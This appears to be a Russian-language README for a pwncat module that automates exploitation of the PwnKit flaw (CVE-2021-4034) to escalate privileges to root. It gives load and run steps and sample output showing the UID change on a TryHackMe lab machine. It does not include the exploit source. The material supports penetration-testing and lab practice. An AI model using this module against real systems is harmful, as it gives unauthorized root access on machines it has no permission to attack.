
Модуль pwncat, который автоматически эксплуатирует CVE-2021-4034 (pwnkit)
Цель этого модуля — попытаться эксплуатировать CVE-2021-4034 (pwnkit) на целевой системе при использовании pwncat.
Нет необходимости создавать какие-либо каталоги, компилировать исходный код или даже иметь gcc на удалённой цели; модуль pwnkit берёт на себя всё это автоматически с помощью фреймворка pwncat.
pwnkit.py куда-нибудь на ваш хост, где установлен pwncat-cs. Например: /home/user/pwncat_modsload /home/user/pwncat_modssearch pwnkit. Вы должны увидеть что-то вроде этого:(local) pwncat$ search pwnkit
Results
╷
Name │ Description
══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════
pwnkit │ Exploit CVE-2021-4034 to privesc to root
run pwnkit. Если всё успешно, вы должны увидеть, как UID изменится на 0, и теперь вы root. Например:(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0) manager.py:955
Module pwnkit completed successfully run.py:100
(local) pwncat$
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
load, вы можете настроить pwncat на автоматическую загрузку этого модуля при запуске, поместив его в ~/.local/share/pwncat/modules# Set the gcc path
set cross "/usr/bin/gcc"
Особая благодарность Caleb Stewart за помощь, пока я осваивал фреймворк pwncat с точки зрения разработчика. Когда-нибудь, когда у меня будет свободное время, я отправлю pull request, чтобы добавить это в основной модуль escalate в pwncat... Обещаю. :-)